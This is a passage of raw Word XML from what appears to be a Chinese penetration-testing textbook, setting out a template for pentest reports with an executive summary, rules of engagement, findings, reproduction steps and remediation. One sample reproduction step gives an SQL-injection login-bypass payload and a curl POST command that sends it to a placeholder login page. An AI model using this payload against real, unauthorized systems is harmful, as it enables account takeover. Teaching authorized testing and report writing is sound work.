          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发现与风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">复现步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试的价值最终以报告形式交付给授权目标的所有者或运维方。一份规范的渗透报告既要让技术读者能够复现发现，也要让管理层理解业务风险并做出优先级决策。本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已从方法论角度介绍了报告的结构要素，这里结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实战，给出一个可直接套用的范本骨架。报告中的所有风险评级采用“严重</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">低”定性描述，不编造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分值②；环境相关的值（IP、域名、哈希、flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）一律以占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（1）执行摘要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行摘要面向决策者，用一页内篇幅讲清四件事：测试背景、核心发现、总体评价和建议。写法直达本质，不加技术堆砌。示例：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“本次渗透测试针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_ORGANIZATION&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;APPLICATION_OR_NETWORK&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">开展，采用灰盒/黑盒方式，时间窗口为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DATE_RANGE&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">，符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ROE_REF&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">范围内的授权。测试过程中成功完成从外部侦察到获得系统级访问的完整攻击链，发现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NUM&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">个严重漏洞和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NUM&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">个高危漏洞。这些漏洞组合可能导致核心业务数据泄露或服务中断。建议优先修复以下三项：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TOP_3_FINDINGS&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">，并在全组织推行纵深防御策略。”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行摘要中的风险评价不单独赋值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS，仅作定性说明②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（2）范围与交战规则（RoE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Rules of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确测试的边界和约束，避免因越界产生法律或业务风险。内容包括：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权对象（IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络范围，用占位符），授权方与测试方签名确认的记录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试类型（外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无线</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">社会工程学，根据实际情况选择）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间窗口（允许测试的时间段，含起止日期和每日测试时段）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁止事项（如禁止对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;PRODUCTION_SYSTEM&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施拒绝服务攻击、禁止物理破坏等）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联系方式与通报流程（发现严重漏洞时的即时通报路径）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试环境标识：所有实操均在隔离实验网络或授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub / HTB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机器）中完成，严禁未经授权接触任何生产系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（3）发现与风险汇总</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按严重等级分组列出所有发现的漏洞条目，每条至少包含：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞编号（内部索引，非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞名称与影响系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录页面参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险等级（严重/高/中/低），并简要说明评定依据（如“严重：可获取全部用户凭据并实现远程代码执行”）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否可被外部利用、是否需要认证等条件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表中数值为示例，实际因靶机而异②。不编造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（4）复现步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复现步骤是报告的技术核心，必须写得让第三方能够准确重现。规则：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每一步给出具体命令（真实工具语法，环境值占位）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不编造任何保证生效的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或唯一性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必要时附截图/日志片段（占位描述，不编造内容）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">示例条目结构（直接取自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中某一步）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“漏洞：SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">注入导致管理员登录绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_URL&gt;/login.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">字段输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">，password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">留空</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST '&lt;TARGET_URL&gt;/login.php' -d 'username=admin%27%20--&amp;password='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：服务端返回包含管理后台会话令牌的响应，跳过密码验证②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">若未成功，检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">或参数编码，参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ch11 SQLi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">章节。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复现步骤的完整性是验证修复是否有效的依据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（5）修复建议</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议的出发点是蓝队防御工程（卷五），每一条建议均对应攻击利用环节的防御措施。建议形式为：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对漏洞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：&lt;自然语言建议，不写具体配置行号&gt;。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依据：&lt;引用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指导</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
